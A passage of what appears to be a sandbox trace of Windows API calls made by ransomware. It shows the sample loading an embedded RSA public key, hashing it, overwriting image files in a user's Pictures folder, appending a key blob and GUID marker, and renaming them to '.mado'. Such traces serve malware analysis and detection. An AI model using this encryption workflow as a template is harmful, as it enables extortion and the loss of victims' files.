KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.538] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.538] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.539] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.539] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.539] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.539] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.539] GetLastError () returned 0x0 [0205.539] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.539] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.539] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.540] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.540] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.540] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.540] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14ca9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.541] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.541] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.541] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.541] CloseHandle (hObject=0x63c) returned 1 [0205.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.542] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\V0zNn L8xo47.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\v0znn l8xo47.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\V0zNn L8xo47.png.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\v0znn l8xo47.png.mado")) returned 1 [0205.543] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18db7f80, ftCreationTime.dwHighDateTime=0x1d5e063, ftLastAccessTime.dwLowDateTime=0xf1162a00, ftLastAccessTime.dwHighDateTime=0x1d5dcc4, ftLastWriteTime.dwLowDateTime=0xf1162a00, ftLastWriteTime.dwHighDateTime=0x1d5dcc4, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Vt74MGMiL.jpg", cAlternateFileName="_VT74M~1.JPG")) returned 1 [0205.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b670f0 [0205.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.544] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\_Vt74MGMiL.jpg") returned=".jpg" [0205.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\_Vt74MGMiL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\_vt74mgmil.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.544] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=16372) returned 1 [0205.544] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.546] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3fce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.546] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.557] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x3ff4, lpOverlapped=0x0) returned 1 [0205.558] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.558] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.558] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.558] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.559] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.559] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.559] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.559] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.559] GetLastError () returned 0x0 [0205.559] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.559] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.559] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.559] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.559] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.559] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6eb80, Size=0x218) returned 0x3b7c6a8 [0205.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.560] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x3ff4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.560] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72d90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72d90*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.560] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.560] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.560] CloseHandle (hObject=0x63c) returned 1 [0205.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0205.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x3b74e80 [0205.561] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\_Vt74MGMiL.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\_vt74mgmil.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\_Vt74MGMiL.jpg.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\_vt74mgmil.jpg.mado")) returned 1 [0205.563] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18db7f80, ftCreationTime.dwHighDateTime=0x1d5e063, ftLastAccessTime.dwLowDateTime=0xf1162a00, ftLastAccessTime.dwHighDateTime=0x1d5dcc4, ftLastWriteTime.dwLowDateTime=0xf1162a00, ftLastWriteTime.dwHighDateTime=0x1d5dcc4, nFileSizeHigh=0x0, nFileSizeLow=0x3ff4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_Vt74MGMiL.jpg", cAlternateFileName="_VT74M~1.JPG")) returned 0 [0205.563] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0205.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67168 | out: hHeap=0x2c0000) returned 1 [0205.563] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.563] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b74e80 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0205.567] RtlAllocateHeap (HeapHandle=0x2c0000, 